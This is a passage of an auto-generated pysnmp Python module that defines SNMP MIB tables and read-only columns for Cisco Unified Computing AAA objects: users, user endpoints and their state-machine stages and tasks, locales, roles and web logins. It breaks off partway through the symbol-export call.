if mibBuilder.loadTexts: cucsAaaUserPwdLifeTime.setStatus('current')
cucsAaaUserConfigState = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 32, 1, 20), CucsAaaConfigState()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserConfigState.setStatus('current')
cucsAaaUserConfigStatusMessage = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 32, 1, 21), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserConfigStatusMessage.setStatus('current')
cucsAaaUserEncPwdSet = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 32, 1, 22), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEncPwdSet.setStatus('current')
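# cucsAaaUserDataTable -- AaaUserData managed objects (1.3.6.1.4.1.9.9.719.1.2.40); rows indexed by cucsAaaUserDataInstanceId.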
cucsAaaUserDataTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 40), )
if mibBuilder.loadTexts: cucsAaaUserDataTable.setStatus('current')
cucsAaaUserDataEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 40, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaUserDataInstanceId"))
if mibBuilder.loadTexts: cucsAaaUserDataEntry.setStatus('current')
cucsAaaUserDataInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 40, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaUserDataInstanceId.setStatus('current')
cucsAaaUserDataDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 40, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserDataDn.setStatus('current')
cucsAaaUserDataRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 40, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserDataRn.setStatus('current')
cucsAaaUserDataDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 40, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserDataDescr.setStatus('current')
cucsAaaUserDataIntId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 40, 1, 5), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserDataIntId.setStatus('current')
cucsAaaUserDataName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 40, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserDataName.setStatus('current')
cucsAaaUserDataPwdChangeCount = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 40, 1, 7), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserDataPwdChangeCount.setStatus('current')
cucsAaaUserDataPwdChangeIntervalBegin = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 40, 1, 8), DateAndTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserDataPwdChangeIntervalBegin.setStatus('current')
cucsAaaUserDataPwdChangedDate = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 40, 1, 9), DateAndTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserDataPwdChangedDate.setStatus('current')
cucsAaaUserDataPwdHistory = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 40, 1, 10), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserDataPwdHistory.setStatus('current')
cucsAaaUserDataPolicyLevel = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 40, 1, 11), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserDataPolicyLevel.setStatus('current')
cucsAaaUserDataPolicyOwner = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 40, 1, 12), CucsPolicyPolicyOwner()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserDataPolicyOwner.setStatus('current')
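# cucsAaaUserEpTable -- AaaUserEp managed objects (1.3.6.1.4.1.9.9.719.1.2.33); rows indexed by cucsAaaUserEpInstanceId.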
cucsAaaUserEpTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 33), )
if mibBuilder.loadTexts: cucsAaaUserEpTable.setStatus('current')
cucsAaaUserEpEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 33, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaUserEpInstanceId"))
if mibBuilder.loadTexts: cucsAaaUserEpEntry.setStatus('current')
cucsAaaUserEpInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 33, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaUserEpInstanceId.setStatus('current')
cucsAaaUserEpDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 33, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpDn.setStatus('current')
cucsAaaUserEpRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 33, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpRn.setStatus('current')
cucsAaaUserEpDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 33, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpDescr.setStatus('current')
cucsAaaUserEpFsmDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 33, 1, 5), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmDescr.setStatus('current')
cucsAaaUserEpFsmPrev = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 33, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmPrev.setStatus('current')
cucsAaaUserEpFsmProgr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 33, 1, 7), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmProgr.setStatus('current')
cucsAaaUserEpFsmRmtInvErrCode = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 33, 1, 8), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmRmtInvErrCode.setStatus('current')
cucsAaaUserEpFsmRmtInvErrDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 33, 1, 9), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmRmtInvErrDescr.setStatus('current')
cucsAaaUserEpFsmRmtInvRslt = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 33, 1, 10), CucsConditionRemoteInvRslt()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmRmtInvRslt.setStatus('current')
cucsAaaUserEpFsmStageDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 33, 1, 11), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmStageDescr.setStatus('current')
cucsAaaUserEpFsmStamp = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 33, 1, 12), DateAndTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmStamp.setStatus('current')
cucsAaaUserEpFsmStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 33, 1, 13), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmStatus.setStatus('current')
cucsAaaUserEpFsmTry = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 33, 1, 14), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmTry.setStatus('current')
cucsAaaUserEpIntId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 33, 1, 15), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpIntId.setStatus('current')
cucsAaaUserEpName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 33, 1, 16), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpName.setStatus('current')
cucsAaaUserEpPwdStrengthCheck = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 33, 1, 17), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpPwdStrengthCheck.setStatus('current')
cucsAaaUserEpPolicyLevel = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 33, 1, 19), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpPolicyLevel.setStatus('current')
cucsAaaUserEpPolicyOwner = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 33, 1, 20), CucsPolicyPolicyOwner()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpPolicyOwner.setStatus('current')
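# cucsAaaUserEpFsmTable -- AaaUserEpFsm managed objects (1.3.6.1.4.1.9.9.719.1.2.53); rows indexed by cucsAaaUserEpFsmInstanceId.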
cucsAaaUserEpFsmTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 53), )
if mibBuilder.loadTexts: cucsAaaUserEpFsmTable.setStatus('current')
cucsAaaUserEpFsmEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 53, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaUserEpFsmInstanceId"))
if mibBuilder.loadTexts: cucsAaaUserEpFsmEntry.setStatus('current')
cucsAaaUserEpFsmInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 53, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaUserEpFsmInstanceId.setStatus('current')
cucsAaaUserEpFsmDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 53, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmDn.setStatus('current')
cucsAaaUserEpFsmRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 53, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmRn.setStatus('current')
cucsAaaUserEpFsmCompletionTime = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 53, 1, 4), DateAndTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmCompletionTime.setStatus('current')
cucsAaaUserEpFsmCurrentFsm = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 53, 1, 5), CucsAaaUserEpFsmCurrentFsm()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmCurrentFsm.setStatus('current')
cucsAaaUserEpFsmDescrData = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 53, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmDescrData.setStatus('current')
cucsAaaUserEpFsmFsmStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 53, 1, 7), CucsFsmFsmStageStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmFsmStatus.setStatus('current')
cucsAaaUserEpFsmProgress = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 53, 1, 8), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmProgress.setStatus('current')
cucsAaaUserEpFsmRmtErrCode = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 53, 1, 9), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmRmtErrCode.setStatus('current')
cucsAaaUserEpFsmRmtErrDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 53, 1, 10), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmRmtErrDescr.setStatus('current')
cucsAaaUserEpFsmRmtRslt = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 53, 1, 11), CucsConditionRemoteInvRslt()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmRmtRslt.setStatus('current')
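# cucsAaaUserEpFsmStageTable -- AaaUserEpFsmStage managed objects (1.3.6.1.4.1.9.9.719.1.2.54); rows indexed by cucsAaaUserEpFsmStageInstanceId.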
cucsAaaUserEpFsmStageTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 54), )
if mibBuilder.loadTexts: cucsAaaUserEpFsmStageTable.setStatus('current')
cucsAaaUserEpFsmStageEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 54, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaUserEpFsmStageInstanceId"))
if mibBuilder.loadTexts: cucsAaaUserEpFsmStageEntry.setStatus('current')
cucsAaaUserEpFsmStageInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 54, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaUserEpFsmStageInstanceId.setStatus('current')
cucsAaaUserEpFsmStageDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 54, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmStageDn.setStatus('current')
cucsAaaUserEpFsmStageRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 54, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmStageRn.setStatus('current')
cucsAaaUserEpFsmStageDescrData = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 54, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmStageDescrData.setStatus('current')
cucsAaaUserEpFsmStageLastUpdateTime = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 54, 1, 5), DateAndTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmStageLastUpdateTime.setStatus('current')
cucsAaaUserEpFsmStageName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 54, 1, 6), CucsAaaUserEpFsmStageName()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmStageName.setStatus('current')
cucsAaaUserEpFsmStageOrder = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 54, 1, 7), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmStageOrder.setStatus('current')
cucsAaaUserEpFsmStageRetry = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 54, 1, 8), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmStageRetry.setStatus('current')
cucsAaaUserEpFsmStageStageStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 54, 1, 9), CucsFsmFsmStageStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmStageStageStatus.setStatus('current')
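# cucsAaaUserEpFsmTaskTable -- AaaUserEpFsmTask managed objects (1.3.6.1.4.1.9.9.719.1.2.34); rows indexed by cucsAaaUserEpFsmTaskInstanceId.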
cucsAaaUserEpFsmTaskTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 34), )
if mibBuilder.loadTexts: cucsAaaUserEpFsmTaskTable.setStatus('current')
cucsAaaUserEpFsmTaskEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 34, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaUserEpFsmTaskInstanceId"))
if mibBuilder.loadTexts: cucsAaaUserEpFsmTaskEntry.setStatus('current')
cucsAaaUserEpFsmTaskInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 34, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaUserEpFsmTaskInstanceId.setStatus('current')
cucsAaaUserEpFsmTaskDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 34, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmTaskDn.setStatus('current')
cucsAaaUserEpFsmTaskRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 34, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmTaskRn.setStatus('current')
cucsAaaUserEpFsmTaskCompletion = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 34, 1, 4), CucsFsmCompletion()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmTaskCompletion.setStatus('current')
cucsAaaUserEpFsmTaskFlags = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 34, 1, 5), CucsFsmFlags()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmTaskFlags.setStatus('current')
cucsAaaUserEpFsmTaskItem = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 34, 1, 6), CucsAaaUserEpFsmTaskItem()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmTaskItem.setStatus('current')
cucsAaaUserEpFsmTaskSeqId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 34, 1, 7), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserEpFsmTaskSeqId.setStatus('current')
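# cucsAaaUserLocaleTable -- AaaUserLocale managed objects (1.3.6.1.4.1.9.9.719.1.2.35); rows indexed by cucsAaaUserLocaleInstanceId.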
cucsAaaUserLocaleTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 35), )
if mibBuilder.loadTexts: cucsAaaUserLocaleTable.setStatus('current')
cucsAaaUserLocaleEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 35, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaUserLocaleInstanceId"))
if mibBuilder.loadTexts: cucsAaaUserLocaleEntry.setStatus('current')
cucsAaaUserLocaleInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 35, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaUserLocaleInstanceId.setStatus('current')
cucsAaaUserLocaleDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 35, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserLocaleDn.setStatus('current')
cucsAaaUserLocaleRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 35, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserLocaleRn.setStatus('current')
cucsAaaUserLocaleDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 35, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserLocaleDescr.setStatus('current')
cucsAaaUserLocaleName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 35, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserLocaleName.setStatus('current')
cucsAaaUserLocaleConfigState = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 35, 1, 7), CucsAaaConfigState()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserLocaleConfigState.setStatus('current')
cucsAaaUserLocaleConfigStatusMessage = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 35, 1, 8), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserLocaleConfigStatusMessage.setStatus('current')
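# cucsAaaUserRoleTable -- AaaUserRole managed objects (1.3.6.1.4.1.9.9.719.1.2.36); rows indexed by cucsAaaUserRoleInstanceId.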
cucsAaaUserRoleTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 36), )
if mibBuilder.loadTexts: cucsAaaUserRoleTable.setStatus('current')
cucsAaaUserRoleEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 36, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaUserRoleInstanceId"))
if mibBuilder.loadTexts: cucsAaaUserRoleEntry.setStatus('current')
cucsAaaUserRoleInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 36, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaUserRoleInstanceId.setStatus('current')
cucsAaaUserRoleDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 36, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserRoleDn.setStatus('current')
cucsAaaUserRoleRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 36, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserRoleRn.setStatus('current')
cucsAaaUserRoleDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 36, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserRoleDescr.setStatus('current')
cucsAaaUserRoleName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 36, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserRoleName.setStatus('current')
cucsAaaUserRoleConfigState = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 36, 1, 7), CucsAaaConfigState()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserRoleConfigState.setStatus('current')
cucsAaaUserRoleConfigStatusMessage = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 36, 1, 8), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaUserRoleConfigStatusMessage.setStatus('current')
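# cucsAaaWebLoginTable -- AaaWebLogin managed objects (1.3.6.1.4.1.9.9.719.1.2.37); rows indexed by cucsAaaWebLoginInstanceId.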
cucsAaaWebLoginTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 37), )
if mibBuilder.loadTexts: cucsAaaWebLoginTable.setStatus('current')
cucsAaaWebLoginEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 37, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaWebLoginInstanceId"))
if mibBuilder.loadTexts: cucsAaaWebLoginEntry.setStatus('current')
cucsAaaWebLoginInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 37, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaWebLoginInstanceId.setStatus('current')
cucsAaaWebLoginDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 37, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaWebLoginDn.setStatus('current')
cucsAaaWebLoginRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 37, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaWebLoginRn.setStatus('current')
cucsAaaWebLoginDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 37, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaWebLoginDescr.setStatus('current')
cucsAaaWebLoginId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 37, 1, 5), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaWebLoginId.setStatus('current')
cucsAaaWebLoginIntId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 37, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaWebLoginIntId.setStatus('current')
cucsAaaWebLoginLocalHost = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 37, 1, 7), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaWebLoginLocalHost.setStatus('current')
cucsAaaWebLoginName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 37, 1, 8), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaWebLoginName.setStatus('current')
cucsAaaWebLoginRemoteHost = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 37, 1, 9), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaWebLoginRemoteHost.setStatus('current')
cucsAaaWebLoginSession = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 37, 1, 10), CucsAaaSession()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaWebLoginSession.setStatus('current')
cucsAaaWebLoginSwitchId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 37, 1, 11), CucsNetworkSwitchId()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaWebLoginSwitchId.setStatus('current')
cucsAaaWebLoginPolicyLevel = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 37, 1, 12), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaWebLoginPolicyLevel.setStatus('current')
cucsAaaWebLoginPolicyOwner = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 37, 1, 13), CucsPolicyPolicyOwner()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaWebLoginPolicyOwner.setStatus('current')
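# Register every symbol defined above under the CISCO-UNIFIED-COMPUTING-AAA-MIB module name;
# PYSNMP_MODULE_ID is bound to cucsAaaObjects.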
mibBuilder.exportSymbols("CISCO-UNIFIED-COMPUTING-AAA-MIB", cucsAaaPwdProfileDescr=cucsAaaPwdProfileDescr, cucsAaaRadiusProviderOrder=cucsAaaRadiusProviderOrder, cucsAaaExtMgmtCutThruTknEntry=cucsAaaExtMgmtCutThruTknEntry, cucsAaaDefaultAuthRefreshPeriod=cucsAaaDefaultAuthRefreshPeriod, cucsAaaRoleDn=cucsAaaRoleDn, cucsAaaLdapProviderEnableSSL=cucsAaaLdapProviderEnableSSL, cucsAaaRealmFsmRmtErrCode=cucsAaaRealmFsmRmtErrCode, cucsAaaUserEpFsmProgr=cucsAaaUserEpFsmProgr, cucsAaaLogRn=cucsAaaLogRn, cucsAaaUserEpFsmRmtInvErrDescr=cucsAaaUserEpFsmRmtInvErrDescr, cucsAaaEpLoginIntId=cucsAaaEpLoginIntId, cucsAaaLdapEpFsmDescr=cucsAaaLdapEpFsmDescr, cucsAaaConsoleAuthName=cucsAaaConsoleAuthName, cucsAaaLdapProviderEntry=cucsAaaLdapProviderEntry, cucsAaaDomainSessionTimeout=cucsAaaDomainSessionTimeout, cucsAaaUserEpFsmFsmStatus=cucsAaaUserEpFsmFsmStatus, cucsAaaRadiusProviderTimeout=cucsAaaRadiusProviderTimeout, cucsAaaCimcSessionInstanceId=cucsAaaCimcSessionInstanceId, cucsAaaTacacsPlusProviderTimeout=cucsAaaTacacsPlusProviderTimeout, cucsAaaConsoleAuthDn=cucsAaaConsoleAuthDn, cucsAaaDomainAuthTable=cucsAaaDomainAuthTable, cucsAaaUserExpires=cucsAaaUserExpires, cucsAaaSessionRefreshPeriod=cucsAaaSessionRefreshPeriod, cucsAaaAuthRealmDn=cucsAaaAuthRealmDn, 